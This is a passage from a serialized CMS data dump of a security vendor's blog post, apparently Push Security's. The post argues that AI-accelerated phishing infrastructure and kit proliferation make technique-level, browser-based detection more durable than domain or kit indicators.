new problem so much as it's compressed the timelines on an existing one — attackers can generate infrastructure, iterate on tooling, and industrialize newly discovered techniques faster than before. The bottom layers of the Pyramid are collapsing under the weight of machine-speed operations, and the middle layers are starting to buckle too.",{"data":7449,"content":7450,"nodeType":860},{},[7451],{"data":7452,"marks":7453,"value":7454,"nodeType":864},{},[],"These changes mean that technique-level detection is more important than ever. In this article, we’ll dig into how the Pyramid is changing, and what this means for our detection philosophy at Push (TL;DR — it reinforces the path we’re already on: building detections at the top of the Pyramid by harnessing browser visibility). ",{"data":7456,"content":7457,"nodeType":1005},{},[],{"data":7459,"content":7460,"nodeType":1009},{},[7461],{"data":7462,"marks":7463,"value":7465,"nodeType":864},{},[7464],{"type":899},"The bottom of the Pyramid was already crumbling",{"data":7467,"content":7468,"nodeType":860},{},[7469,7473,7481],{"data":7470,"marks":7471,"value":7472,"nodeType":864},{},[],"The case against indicator-based detection didn't need AI to be compelling. ",{"data":7474,"content":7476,"nodeType":883},{"uri":7475},"https://www.spamhaus.org/",[7477],{"data":7478,"marks":7479,"value":7480,"nodeType":864},{},[],"89% of phishing domains are active for fewer than two days",{"data":7482,"marks":7483,"value":7484,"nodeType":864},{},[],", with just 6.5% surviving past 15 days — by the time a domain makes it onto a blocklist, the campaign has moved on.",{"data":7486,"content":7487,"nodeType":860},{},[7488,7492,7500],{"data":7489,"marks":7490,"value":7491,"nodeType":864},{},[],"We've ",{"data":7493,"content":7495,"nodeType":883},{"uri":7494},"https://pushsecurity.com/blog/why-most-phishing-attacks-feel-like-a-zero-day/",[7496],{"data":7497,"marks":7498,"value":7499,"nodeType":864},{},[],"written before",{"data":7501,"marks":7502,"value":7503,"nodeType":864},{},[]," about how this makes every phishing attack effectively a zero-day for organizations relying on known-bad detection. The phishing kit's behavior — its page structure, script signatures, malicious payload mechanics — is the only detection target that outlasts a single campaign.",{"data":7505,"content":7506,"nodeType":860},{},[7507],{"data":7508,"marks":7509,"value":7510,"nodeType":864},{},[],"When we blogged about the Pyramid of Pain for modern attacks that happen predominantly over the internet, with minimal (or zero) endpoint contact, it first looked like this: ",{"data":7512,"content":7516,"nodeType":996},{"target":7513},{"sys":7514},{"id":7515,"type":1001,"linkType":1002},"2N04ycJ6RKGfHdX5X1TwU3",[],{"data":7518,"content":7519,"nodeType":860},{},[7520],{"data":7521,"marks":7522,"value":7523,"nodeType":864},{},[],"Now, it looks more like this:",{"data":7525,"content":7529,"nodeType":996},{"target":7526},{"sys":7527},{"id":7528,"type":1001,"linkType":1002},"mfhP4WToOQkrHnVkXU0tX",[],{"data":7531,"content":7532,"nodeType":860},{},[7533],{"data":7534,"marks":7535,"value":7536,"nodeType":864},{},[],"Let’s explore why. ",{"data":7538,"content":7539,"nodeType":1312},{},[7540],{"data":7541,"marks":7542,"value":7544,"nodeType":864},{},[7543],{"type":899},"AI is accelerating phishing rotation and delivery",{"data":7546,"content":7547,"nodeType":860},{},[7548],{"data":7549,"marks":7550,"value":7551,"nodeType":864},{},[],"Attackers are harnessing AI at every stage, speeding up the process of creating, rotating, and replacing phishing infrastructure at every level, as well as capitalizing on AI adoption itself to enhance their lures. The operational signature is more domains, shorter lifespans, more variation, and fewer of the reuse patterns that blocklists depend on.",{"data":7553,"content":7554,"nodeType":860},{},[7555,7559,7566],{"data":7556,"marks":7557,"value":7558,"nodeType":864},{},[],"Attackers can ",{"data":7560,"content":7561,"nodeType":883},{"uri":7180},[7562],{"data":7563,"marks":7564,"value":7565,"nodeType":864},{},[],"vibe-code entire phishing pages in minutes",{"data":7567,"marks":7568,"value":7569,"nodeType":864},{},[]," — not just cloning legitimate login pages but vibe-cloning them, feeding an AI a screenshot and having it rebuild a convincing frontend with a completely unique backend. ",{"data":7571,"content":7572,"nodeType":860},{},[7573,7577,7585,7589,7597],{"data":7574,"marks":7575,"value":7576,"nodeType":864},{},[],"We've seen attackers clone free SaaS tools like background removers and PDF converters, then inject phishing components or ClickFix payloads into what looks like a functional utility. We’ve even seen attackers distributing malware using AI-generated pages shared using ",{"data":7578,"content":7579,"nodeType":883},{"uri":5327},[7580],{"data":7581,"marks":7582,"value":7584,"nodeType":864},{},[7583],{"type":1455},"LLM tool sharing functionality",{"data":7586,"marks":7587,"value":7588,"nodeType":864},{},[],", resulting in phishing delivery pages hosted on real claude.ai and chatgpt.com. And legitimate cloud platforms like ",{"data":7590,"content":7592,"nodeType":883},{"uri":7591},"https://www.huntress.com/blog/railway-paas-m365-token-replay-campaign",[7593],{"data":7594,"marks":7595,"value":7596,"nodeType":864},{},[],"Railway",{"data":7598,"marks":7599,"value":7600,"nodeType":864},{},[],", Cloudflare Workers, and Vercel host and dynamically rotate attack infrastructure, so the domains feeding into blocklists often belong to reputable services that can't simply be blocked. ",{"data":7602,"content":7606,"nodeType":996},{"target":7603},{"sys":7604},{"id":7605,"type":1001,"linkType":1002},"5yoLmqysyQazfzLITCUTfc",[],{"data":7608,"content":7612,"nodeType":996},{"target":7609},{"sys":7610},{"id":7611,"type":1001,"linkType":1002},"5XK5qZMQU19xlA8L2T5y0Z",[],{"data":7614,"content":7615,"nodeType":1312},{},[7616],{"data":7617,"marks":7618,"value":7620,"nodeType":864},{},[7619],{"type":899},"The kit ecosystem is fragmenting faster than anyone can track",{"data":7622,"content":7623,"nodeType":860},{},[7624],{"data":7625,"marks":7626,"value":7627,"nodeType":864},{},[],"What we see across our install base is a huge and growing variation in phishing kits — new kits, derivative kits of known platforms, derivatives of those derivatives — appearing on a weekly basis.",{"data":7629,"content":7630,"nodeType":860},{},[7631,7635,7642],{"data":7632,"marks":7633,"value":7634,"nodeType":864},{},[],"As we reported in our ",{"data":7636,"content":7637,"nodeType":883},{"uri":6543},[7638],{"data":7639,"marks":7640,"value":7641,"nodeType":864},{},[],"Browser Attacks Report",{"data":7643,"marks":7644,"value":7645,"nodeType":864},{},[],", the most common AiTM kits we detected over the last year were Tycoon 2FA (59% of detections), followed by Sneaky 2FA, FlowerStorm, Evilginx (nominally a red team tool, but widely abused by attackers), NakedPages, Gabagool, and dozens more — but those established names are just the visible layer.",{"data":7647,"content":7648,"nodeType":860},{},[7649,7653,7661,7665,7672],{"data":7650,"marks":7651,"value":7652,"nodeType":864},{},[],"Code is forked, modified, and redeployed across kits in a pattern that ",{"data":7654,"content":7656,"nodeType":883},{"uri":7655},"https://blog.barracuda.com/2026/04/16/threat-spotlight-tycoon-2fa-scattered-everywhere",[7657],{"data":7658,"marks":7659,"value":7660,"nodeType":864},{},[],"resembles open-source development",{"data":7662,"marks":7663,"value":7664,"nodeType":864},{},[]," more than traditional criminal enterprise, and the rate at which new variants appear is accelerating. The ",{"data":7666,"content":7667,"nodeType":883},{"uri":3259},[7668],{"data":7669,"marks":7670,"value":7671,"nodeType":864},{},[],"Venom kit",{"data":7673,"marks":7674,"value":7675,"nodeType":864},{},[]," reuses Sneaky 2FA's AiTM infrastructure but carries different branding and adds device code phishing — whether it's the same developers, stolen code, or a deliberate fork is unclear.",{"data":7677,"content":7678,"nodeType":860},{},[7679,7683,7691,7695,7704],{"data":7680,"marks":7681,"value":7682,"nodeType":864},{},[],"Tycoon 2FA illustrates the scale of the evolution. The kit evolves continuously, addingnew capabilities, new evasion techniques, and hybridizing with other platforms. Even when Sekoia and Microsoft seized 330+ Tycoon domains in March 2026, the techniques it popularized were already embedded across competitors, and the slack was taken up by rival platforms within days. And in any case, Tycoon was back to ",{"data":7684,"content":7686,"nodeType":883},{"uri":7685},"https://www.crowdstrike.com/en-us/blog/tycoon2fa-phishing-as-a-service-platform-persists-following-takedown/",[7687],{"data":7688,"marks":7689,"value":7690,"nodeType":864},{},[],"normal levels of operation",{"data":7692,"marks":7693,"value":7694,"nodeType":864},{},[]," shortly after. It has also been observed ",{"data":7696,"content":7698,"nodeType":883},{"uri":7697},"https://www.okta.com/en-nl/blog/threat-intelligence/tycoon_2fa_phishing_actors_scatter/",[7699],{"data":7700,"marks":7701,"value":7703,"nodeType":864},{},[7702],{"type":1455},"pivoting to add new device code phishing capabilities",{"data":7705,"marks":7706,"value":7707,"nodeType":864},{},[]," (more on that below). ",{"data":7709,"content":7710,"nodeType":860},{},[7711],{"data":7712,"marks":7713,"value":7714,"nodeType":864},{},[],"Tear one down and there are many more to take its place — and meanwhile the original is already evolving into something new.",{"data":7716,"content":7720,"nodeType":996},{"target":7717},{"sys":7718},{"id":7719,"type":1001,"linkType":1002},"3UDzUCCizPJhXp3SsoZuSK",[],{"data":7722,"content":7723,"nodeType":1312},{},[7724],{"data":7725,"marks":7726,"value":7728,"nodeType":864},{},[7727],{"type":899},"New techniques are being industrialized faster than ever",{"data":7730,"content":7731,"nodeType":860},{},[7732],{"data":7733,"marks":7734,"value":7735,"nodeType":864},{},[],"As well as the fragmentation of existing kits, we’re seeing new techniques added at an accelerating rate. ",{"data":7737,"content":7738,"nodeType":860},{},[7739,7743],{"data":7740,"marks":7741,"value":360,"nodeType":864},{},[7742],{"type":899},{"data":7744,"marks":7745,"value":7746,"nodeType":864},{},[]," is the clearest case study. From early nation state adoption in 2024, it took until 2026 for criminal adoption to really take off, but the take-up this year is unprecedented. The EvilTokens kit packaged device code phishing into a PhaaS offering with GPT-powered spear-phishing and adaptive landing pages, hitting 340+ organizations across five countries in March 2026. ",{"data":7748,"content":7749,"nodeType":860},{},[7750],{"data":7751,"marks":7752,"value":7753,"nodeType":864},{},[],"Now, device code functionality is now a core phish kit component. We’re tracking 18+ kits with device code phishing capabilities and a 37.5x increase in device code phishing detections this year alone, with the technique moving from state-sponsored exclusivity to something any PhaaS customer can rent.",{"data":7755,"content":7756,"nodeType":860},{},[7757,7761,7769,7773,7778,7782,7790],{"data":7758,"marks":7759,"value":7760,"nodeType":864},{},[],"Similarly, when we ",{"data":7762,"content":7764,"nodeType":883},{"uri":7763},"https://pushsecurity.com/blog/inside-criminal-phishing-panel",[7765],{"data":7766,"marks":7767,"value":7768,"nodeType":864},{},[],"infiltrated Doko's Panel",{"data":7770,"marks":7771,"value":7772,"nodeType":864},{},[]," — a ",{"data":7774,"marks":7775,"value":7777,"nodeType":864},{},[7776],{"type":899},"real-time vishing and AiTM platform",{"data":7779,"marks":7780,"value":7781,"nodeType":864},{},[]," used by ShinyHunters and affiliated groups — the codebase was full of LLM-generated artifacts. Multiple groups were using the templated vishing panel and spinning up their own variants, but the AI-generated indicators persisted throughout. This approach to real-time vishing + browser payload has been a ",{"data":7783,"content":7784,"nodeType":883},{"uri":4082},[7785],{"data":7786,"marks":7787,"value":7789,"nodeType":864},{},[7788],{"type":1455},"mainstay of the Com affiliates like ShinyHunters this year",{"data":7791,"marks":7792,"value":1774,"nodeType":864},{},[],{"data":7794,"content":7798,"nodeType":996},{"target":7795},{"sys":7796},{"id":7797,"type":1001,"linkType":1002},"01mOiserRBXraawXwQyJNm",[],{"data":7800,"content":7801,"nodeType":860},{},[7802,7806,7810,7814,7823,7827,7835],{"data":7803,"marks":7804,"value":7805,"nodeType":864},{},[],"The broader ",{"data":7807,"marks":7808,"value":315,"nodeType":864},{},[7809],{"type":899},{"data":7811,"marks":7812,"value":7813,"nodeType":864},{},[]," family shows the same acceleration: First reported in early 2024 and adopted by four nation-state groups within a single quarter. Fast forward and ",{"data":7815,"content":7817,"nodeType":883},{"uri":7816},"https://www.crowdstrike.com/en-us/global-threat-report/",[7818],{"data":7819,"marks":7820,"value":7822,"nodeType":864},{},[7821],{"type":1455},"CrowdStrike's data",{"data":7824,"marks":7825,"value":7826,"nodeType":864},{},[]," shows a 563% increase in fake CAPTCHA incidents (one of the more common ClickFix lure types), while ",{"data":7828,"content":7829,"nodeType":883},{"uri":5971},[7830],{"data":7831,"marks":7832,"value":7834,"nodeType":864},{},[7833],{"type":1455},"Microsoft reported",{"data":7836,"marks":7837,"value":7838,"nodeType":864},{},[]," it as making up 47% of observed attacks according to their Digital Defense Report.",{"data":7840,"content":7841,"nodeType":860},{},[7842,7846,7850,7854,7861,7865,7872],{"data":7843,"marks":7844,"value":7845,"nodeType":864},{},[],"And ",{"data":7847,"marks":7848,"value":6041,"nodeType":864},{},[7849],{"type":899},{"data":7851,"marks":7852,"value":7853,"nodeType":864},{},[]," — a combination of ClickFix and OAuth consent phishing techniques — suggests the next compression is already underway. Push researchers ",{"data":7855,"content":7856,"nodeType":883},{"uri":6036},[7857],{"data":7858,"marks":7859,"value":7860,"nodeType":864},{},[],"discovered the technique",{"data":7862,"marks":7863,"value":7864,"nodeType":864},{},[]," in December 2025 — a browser-native ClickFix variant hijacking OAuth consent grants via Azure CLI's localhost redirect. It was later confirmed to be tied to APT29. By January 2026, a ",{"data":7866,"content":7867,"nodeType":883},{"uri":6075},[7868],{"data":7869,"marks":7870,"value":7871,"nodeType":864},{},[],"criminal ConsentFix v3 toolkit",{"data":7873,"marks":7874,"value":7875,"nodeType":864},{},[]," had appeared on the XSS forum with Cloudflare Workers, ZoomInfo targeting, and automated exfiltration via Pipedream.",{"data":7877,"content":7881,"nodeType":996},{"target":7878},{"sys":7879},{"id":7880,"type":1001,"linkType":1002},"41FMif4T0y1maflzonWgL8",[],{"data":7883,"content":7884,"nodeType":1005},{},[],{"data":7886,"content":7887,"nodeType":1009},{},[7888],{"data":7889,"marks":7890,"value":7892,"nodeType":864},{},[7891],{"type":899},"Why technique-level detection is the only layer that holds",{"data":7894,"content":7895,"nodeType":860},{},[7896],{"data":7897,"marks":7898,"value":7899,"nodeType":864},{},[],"The middle of the Pyramid — tool signatures and artifacts — used to offer much more durable detection than infrastructure indicators. Fingerprinting a specific phishing kit by its JavaScript structure or HTML patterns provided a detection target that survived across dozens or hundreds of campaigns, even as the underlying domains rotated. Tool level detections are still better, but not by quite the same margin.",{"data":7901,"content":7905,"nodeType":996},{"target":7902},{"sys":7903},{"id":7904,"type":1001,"linkType":1002},"5pxaYdCIFiFKLPhRaPoldX",[],{"data":7907,"content":7908,"nodeType":860},{},[7909],{"data":7910,"marks":7911,"value":7912,"nodeType":864},{},[],"When the kit landscape was dominated by a handful of platforms, you could write signatures for Tycoon, Sneaky2FA, EvilProxy, and so on, and cover the lion's share of attacks. With the ecosystem now producing new variants and entirely new kits on a weekly basis, detecting by kit fingerprint starts to look uncomfortably similar to detecting by domain.",{"data":7914,"content":7915,"nodeType":860},{},[7916],{"data":7917,"marks":7918,"value":7919,"nodeType":864},{},[],"But many of these proliferating kits do share behavioral patterns at a deeper level than their code signatures. For example, every device code phishing kit implements fundamentally the same flow: present a lure, generate a device code via the OAuth Device Authorization endpoint, get the user to enter it on the legitimate authorization page, and poll for the resulting tokens. The frontends vary, the infrastructure varies, but the behavioral pattern doesn't.",{"data":7921,"content":7925,"nodeType":996},{"target":7922},{"sys":7923},{"id":7924,"type":1001,"linkType":1002},"FyyHayQtsJTwoB1kluMOl",[],{"data":7927,"content":7928,"nodeType":860},{},[7929],{"data":7930,"marks":7931,"value":7932,"nodeType":864},{},[],"Genuinely new attack techniques still require human creativity — an attacker has to identify a gap in how a legitimate protocol or feature can be subverted. That kind of innovation hasn't been automated. But the window to discover a technique, build a detection, and then deploy it before it is adopted by criminals at scale is compressing with each generation.",{"data":7934,"content":7935,"nodeType":860},{},[7936],{"data":7937,"marks":7938,"value":7939,"nodeType":864},{},[],"Organizations that detect at the technique level and deploy before commoditization have a structural advantage that increases over time. Waiting for indicators — even tool-level indicators — means chasing a curve that's accelerating away from you. This is the challenge we grapple with every day as we strive for the most resilient detections possible. ",{"data":7941,"content":7942,"nodeType":1116},{},[7943],{"data":7944,"content":7945,"nodeType":860},{},[7946,7950,7958,7962],{"data":7947,"marks":7948,"value":7949,"nodeType":864},{},[],"As our CPO Jacques Louw put it on ",{"data":7951,"content":7953,"nodeType":883},{"uri":7952},"https://risky.biz/RBNEWSSI128/",[7954],{"data":7955,"marks":7956,"value":7957,"nodeType":864},{},[],"Risky Business",{"data":7959,"marks":7960,"value":7961,"nodeType":864},{},[],": ",{"data":7963,"marks":7964,"value":7966,"nodeType":864},{},[7965],{"type":2246},"\"There's no list of bad domains anywhere in the product. It's a crutch — a false cheat code that stops you from doing the detection in the way that actually is resilient, because the next time you see it, it will be on a different domain.\"",{"data":7968,"content":7969,"nodeType":1005},{},[],{"data":7971,"content":7972,"nodeType":1009},{},[7973],{"data":7974,"marks":7975,"value":7977,"nodeType":864},{},[7976],{"type":899},"What it takes to detect at the top of the Pyramid",{"data":7979,"content":7980,"nodeType":860},{},[7981],{"data":7982,"marks":7983,"value":7984,"nodeType":864},{},[],"If technique-level detection is the only layer that holds, two things have to be true about your detection capability: You need the right vantage point, and you need the research velocity to stay ahead.",{"data":7986,"content":7987,"nodeType":1312},{},[7988],{"data":7989,"marks":7990,"value":7992,"nodeType":864},{},[7991],{"type":899},"You need the right vantage point",{"data":7994,"content":7995,"nodeType":860},{},[7996],{"data":7997,"marks":7998,"value":7999,"nodeType":864},{},[],"Technique-level behaviors in browser-based identity attacks — how a phishing page orchestrates credential entry, how a device code flow presents its authorization prompt, how a ClickFix variant manipulates the clipboard — are visible in the browser session and nowhere else.",{"data":8001,"content":8002,"nodeType":860},{},[8003],{"data":8004,"marks":8005,"value":8006,"nodeType":864},{},[],"Network proxies see encrypted traffic and can attempt to reconstruct page behavior from metadata, but DOM manipulation, user interaction sequences, and script execution aren't visible from that vantage point. Email gateways see the delivery mechanism (or nothing at all in the increasing number of social media and search engine based attacks) but not the payload.",{"data":8008,"content":8009,"nodeType":860},{},[8010,8014,8022],{"data":8011,"marks":8012,"value":8013,"nodeType":864},{},[],"As we disclosed in our ",{"data":8015,"content":8016,"nodeType":883},{"uri":6543},[8017],{"data":8018,"marks":8019,"value":8021,"nodeType":864},{},[8020],{"type":1455},"browser attacks report",{"data":8023,"marks":8024,"value":8025,"nodeType":864},{},[],", 95% of in-browser attacks we detect use some form of bot protection, often combined with conditional loading techniques like referrer and browser checks, reliably defeating automated analysis techniques. ",{"data":8027,"content":8028,"nodeType":860},{},[8029],{"data":8030,"marks":8031,"value":8032,"nodeType":864},{},[],"Behavioral detection at the technique level requires observing what happens on the page at the moment the user interacts with it — analyzing pages, not links. When you see the entire browsing flow — ad click, redirect chain, page render, credential prompt — an attack stands out immediately. Without that context, any detection system is forced to fill in gaps, and the gaps are where attacks hide.",{"data":8034,"content":8038,"nodeType":996},{"target":8035},{"sys":8036},{"id":8037,"type":1001,"linkType":1002},"4804g6u4POUDpL42bzP0EY",[],{"data":8040,"content":8041,"nodeType":860},{},[8042],{"data":8043,"marks":8044,"value":8045,"nodeType":864},{},[],"Push sits inside the browser session, observing this in real time. Its detections target the behavioral mechanics of techniques rather than the surface characteristics of individual kits or infrastructure.",{"data":8047,"content":8048,"nodeType":1312},{},[8049],{"data":8050,"marks":8051,"value":8053,"nodeType":864},{},[8052],{"type":899},"You need the research expertise",{"data":8055,"content":8056,"nodeType":860},{},[8057],{"data":8058,"marks":8059,"value":8060,"nodeType":864},{},[],"When the window between technique discovery and industrialized exploitation is measured in weeks rather than years, the detection pipeline needs to operate on that same compressed timescale.",{"data":8062,"content":8063,"nodeType":860},{},[8064,8068,8074],{"data":8065,"marks":8066,"value":8067,"nodeType":864},{},[],"This is where our ",{"data":8069,"content":8070,"nodeType":883},{"uri":7180},[8071],{"data":8072,"marks":8073,"value":7185,"nodeType":864},{},[],{"data":8075,"marks":8076,"value":8077,"nodeType":864},{},[]," fits. It's tripled our monthly detection output — not by generating bigger blocklists, but by scaling the process of discovering behavioral patterns across the telemetry generated by 3+ million browser deployments.",{"data":8079,"content":8080,"nodeType":860},{},[8081],{"data":8082,"marks":8083,"value":8084,"nodeType":864},{},[],"The detections it produces are technique-class by design, targeting how attacks work rather than the infrastructure or specific tool that implements them. The goal is curation, not accumulation — hundreds of high-fidelity behavioral detections rather than the billions of signatures and domain entries that traditional approaches require.",{"data":8086,"content":8087,"nodeType":860},{},[8088,8092,8099],{"data":8089,"marks":8090,"value":8091,"nodeType":864},{},[],"When we detected the first in-the-wild ",{"data":8093,"content":8094,"nodeType":883},{"uri":6024},[8095],{"data":8096,"marks":8097,"value":8098,"nodeType":864},{},[],"InstallFix attack",{"data":8100,"marks":8101,"value":8102,"nodeType":864},{},[]," through the pipeline — a user had searched for NotebookLM, clicked a paid Google ad, and was redirected to a fake page with a WebAssembly C2 connector — the detection shipped to all customers within minutes. It didn't depend on knowing the domain, the ad creative, or the specific kit. It depended on recognizing the technique itself.",{"data":8104,"content":8105,"nodeType":1005},{},[],{"data":8107,"content":8108,"nodeType":1009},{},[8109],{"data":8110,"marks":8111,"value":8113,"nodeType":864},{},[8112],{"type":899},"Technique-level detection is now the only option",{"data":8115,"content":8116,"nodeType":860},{},[8117],{"data":8118,"marks":8119,"value":8120,"nodeType":864},{},[],"As a framework for detection durability, the Pyramid of Pain is more relevant than ever. ",{"data":8122,"content":8123,"nodeType":860},{},[8124],{"data":8125,"marks":8126,"value":8127,"nodeType":864},{},[],"AI has made infrastructure indicators essentially disposable. The tools tier is compressing as criminal vendors vibe-code, fork, and clone tooling at machine speed. Technique-level detection is the layer that holds long-term to be able to proactively detect and block net-new attacks and the kits that power them. ",{"data":8129,"content":8130,"nodeType":860},{},[8131],{"data":8132,"marks":8133,"value":8134,"nodeType":864},{},[],"Novel attack techniques still require human creativity to discover, and detections built around how those techniques work can survive infrastructure rotation, tool proliferation, and kit fragmentation. Defending that layer requires a vantage point inside the browser session and a research pipeline fast enough to stay ahead of the accelerating path from discovery to industrialization.",{"data":8136,"content":8137,"nodeType":1005},{},[],{"data":8139,"content":8140,"nodeType":860},{},[8141],{"data":8142,"marks":8143,"value":1682,"nodeType":864},{},[],{"data":8145,"content":8146,"nodeType":860},{},[8147],{"data":8148,"marks":8149,"value":1689,"nodeType":864},{},[],{"data":8151,"content":8152,"nodeType":860},{},[8153,8156,8164],{"data":8154,"marks":8155,"value":21,"nodeType":864},{},[],{"data":8157,"content":8158,"nodeType":883},{"uri":1700},[8159],{"data":8160,"marks":8161,"value":8163,"nodeType":864},{},[8162],{"type":1455},"Book a live demo",{"data":8165,"marks":8166,"value":2719,"nodeType":864},{},[],"The Pyramid of Pain in the AI era: Why technique-level detection matters more than ever","AI is accelerating the collapse of indicator-based threat detection. Here's why you need technique-level detection to stay ahead.","2026-06-01T00:00:00.000Z","the-pyramid-of-pain-in-the-ai-era",{"items":8172},[8173,8175],{"sys":8174,"name":342},{"id":6596},{"sys":8176,"name":6593},{"id":6592},{"items":8178},[8179],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":8180},{"url":2740},"openai-poisoned-tenant-attack","blog/openai-poisoned-tenant-attack",{"json":8184},{"data":8185,"content":8186,"nodeType":856},{},[8187],{"data":8188,"content":8189,"nodeType":860},{},[8190],{"data":8191,"marks":8192,"value":8193,"nodeType":864},{},[],"Someone created a fake OpenAI organization using our company's name and invited specific Push employees to join it. Here's what we learned. ",{"id":8195,"publishedAt":8196},"gZ98u7GsQBtQWUZAbb9ct","2026-08-12T12:00:42.290Z",{"items":8198},[8199,8201],{"sys":8200,"name":6593},{"id":6592},{"sys":8202,"name":342},{"id":6596},{"items":8204},[8205,8207,8209,8211,8213,8215,8217,8219,8221,8223],{"sys":8206,"name":279,"slug":280,"tier":31},{"id":276},{"sys":8208,"name":413,"slug":414,"tier":31},{"id":410},{"sys":8210,"name":545,"slug":546,"tier":31},{"id":542},{"sys":8212,"name":235,"slug":236,"tier":31},{"id":232},{"sys":8214,"name":607,"slug":608,"tier":45},{"id":604},{"sys":8216,"name":431,"slug":432,"tier":45},{"id":428},{"sys":8218,"name":404,"slug":405,"tier":45},{"id":401},{"sys":8220,"name":580,"slug":581,"tier":45},{"id":577},{"sys":8222,"name":484,"slug":485,"tier":45},{"id":481},{"sys":8224,"name":244,"slug":245,"tier":45},{"id":241},"Onn4BC8-UxOdB3VIa9yf7yNjfejAdGzsCHJaOs85lcM",{"id":8227,"title":7391,"authorsCollection":8228,"content":8232,"extension":228,"faqItemsCollection":9025,"faqTitle":59,"featured":6,"hashTags":59,"meta":9027,"metaTitle":9028,"ogImage":59,"postType":5740,"publishedDate":7393,"relatedBlogPostsCollection":9029,"slug":7394,"stem":12693,"subtitle":59,"summary":12694,"synopsis":7392,"sys":12705,"tagsCollection":12707,"topicsCollection":12713,"__hash__":12739},"blog/blog/llmshare-malvertising-campaign.json",{"items":8229},[8230],{"fullName":7404,"firstName":7405,"jobTitle":7406,"socialLinks":59,"profilePicture":8231},{"url":7408},{"json":8233,"links":8901},{"data":8234,"content":8235,"nodeType":856},{},[8236,8242,8248,8272,8278,8283,8288,8298,8301,8308,8321,8327,8332,8338,8344,8349,8352,8359,8365,8370,8375,8381,8387,8402,8407,8410,8417,8432,8437,8443,8446,8453,8459,8465,8470,8475,8509,8515,8518,8525,8531,8537,8570,8576,8600,8606,8639,8645,8648,8655,8670,8676,8683,8696,8702,8717,8723,8726,8732,8738,8754,8757,8764,8779,8785,8895],{"data":8237,"content":8238,"nodeType":860},{},[8239],{"data":8240,"marks":8241,"value":6614,"nodeType":864},{},[],{"data":8243,"content":8244,"nodeType":860},{},[8245],{"data":8246,"marks":8247,"value":6621,"nodeType":864},{},[],{"data":8249,"content":8250,"nodeType":860},{},[8251,8254,8260,8263,8269],{"data":8252,"marks":8253,"value":6628,"nodeType":864},{},[],{"data":8255,"content":8256,"nodeType":883},{"uri":6631},[8257],{"data":8258,"marks":8259,"value":6636,"nodeType":864},{},[],{"data":8261,"marks":8262,"value":6640,"nodeType":864},{},[],{"data":8264,"content":8265,"nodeType":883},{"uri":6643},[8266],{"data":8267,"marks":8268,"value":6648,"nodeType":864},{},[],{"data":8270,"marks":8271,"value":6652,"nodeType":864},{},[],{"data":8273,"content":8274,"nodeType":860},{},[8275],{"data":8276,"marks":8277,"value":6659,"nodeType":864},{},[],{"data":8279,"content":8282,"nodeType":996},{"target":8280},{"sys":8281},{"id":6664,"type":1001,"linkType":1002},[],{"data":8284,"content":8287,"nodeType":996},{"target":8285},{"sys":8286},{"id":6670,"type":1001,"linkType":1002},[],{"data":8289,"content":8290,"nodeType":860},{},[8291,8295],{"data":8292,"marks":8293,"value":6679,"nodeType":864},{},[8294],{"type":899},{"data":8296,"marks":8297,"value":6683,"nodeType":864},{},[],{"data":8299,"content":8300,"nodeType":1005},{},[],{"data":8302,"content":8303,"nodeType":1009},{},[8304],{"data":8305,"marks":8306,"value":6694,"nodeType":864},{},[8307],{"type":899},{"data":8309,"content":8310,"nodeType":860},{},[8311,8314,8318],{"data":8312,"marks":8313,"value":6701,"nodeType":864},{},[],{"data":8315,"marks":8316,"value":6706,"nodeType":864},{},[8317],{"type":2246},{"data":8319,"marks":8320,"value":6710,"nodeType":864},{},[],{"data":8322,"content":8323,"nodeType":860},{},[8324],{"data":8325,"marks":8326,"value":6717,"nodeType":864},{},[],{"data":8328,"content":8331,"nodeType":996},{"target":8329},{"sys":8330},{"id":6722,"type":1001,"linkType":1002},[],{"data":8333,"content":8334,"nodeType":860},{},[8335],{"data":8336,"marks":8337,"value":6730,"nodeType":864},{},[],{"data":8339,"content":8340,"nodeType":860},{},[8341],{"data":8342,"marks":8343,"value":6737,"nodeType":864},{},[],{"data":8345,"content":8348,"nodeType":996},{"target":8346},{"sys":8347},{"id":6742,"type":1001,"linkType":1002},[],{"data":8350,"content":8351,"nodeType":1005},{},[],{"data":8353,"content":8354,"nodeType":1009},{},[8355],{"data":8356,"marks":8357,"value":6754,"nodeType":864},{},[8358],{"type":899},{"data":8360,"content":8361,"nodeType":860},{},[8362],{"data":8363,"marks":8364,"value":6761,"nodeType":864},{},[],{"data":8366,"content":8369,"nodeType":996},{"target":8367},{"sys":8368},{"id":6766,"type":1001,"linkType":1002},[],{"data":8371,"content":8374,"nodeType":996},{"target":8372},{"sys":8373},{"id":6772,"type":1001,"linkType":1002},[],{"data":8376,"content":8377,"nodeType":860},{},[8378],{"data":8379,"marks":8380,"value":6780,"nodeType":864},{},[],{"data":8382,"content":8383,"nodeType":860},{},[8384],{"data":8385,"marks":8386,"value":6787,"nodeType":864},{},[],{"data":8388,"content":8389,"nodeType":860},{},[8390,8393,8399],{"data":8391,"marks":8392,"value":6794,"nodeType":864},{},[],{"data":8394,"content":8395,"nodeType":883},{"uri":6797},[8396],{"data":8397,"marks":8398,"value":6802,"nodeType":864},{},[],{"data":8400,"marks":8401,"value":2924,"nodeType":864},{},[],{"data":8403,"content":8406,"nodeType":996},{"target":8404},{"sys":8405},{"id":6810,"type":1001,"linkType":1002},[],{"data":8408,"content":8409,"nodeType":1005},{},[],{"data":8411,"content":8412,"nodeType":1009},{},[8413],{"data":8414,"marks":8415,"value":6822,"nodeType":864},{},[8416],{"type":899},{"data":8418,"content":8419,"nodeType":860},{},[8420,8423,8429],{"data":8421,"marks":8422,"value":6829,"nodeType":864},{},[],{"data":8424,"content":8425,"nodeType":883},{"uri":6631},[8426],{"data":8427,"marks":8428,"value":6836,"nodeType":864},{},[],{"data":8430,"marks":8431,"value":6840,"nodeType":864},{},[],{"data":8433,"content":8436,"nodeType":996},{"target":8434},{"sys":8435},{"id":6845,"type":1001,"linkType":1002},[],{"data":8438,"content":8439,"nodeType":860},{},[8440],{"data":8441,"marks":8442,"value":6853,"nodeType":864},{},[],{"data":8444,"content":8445,"nodeType":1005},{},[],{"data":8447,"content":8448,"nodeType":1009},{},[8449],{"data":8450,"marks":8451,"value":6864,"nodeType":864},{},[8452],{"type":899},{"data":8454,"content":8455,"nodeType":860},{},[8456],{"data":8457,"marks":8458,"value":6871,"nodeType":864},{},[],{"data":8460,"content":8461,"nodeType":860},{},[8462],{"data":8463,"marks":8464,"value":6878,"nodeType":864},{},[],{"data":8466,"content":8469,"nodeType":996},{"target":8467},{"sys":8468},{"id":6883,"type":1001,"linkType":1002},[],{"data":8471,"content":8474,"nodeType":996}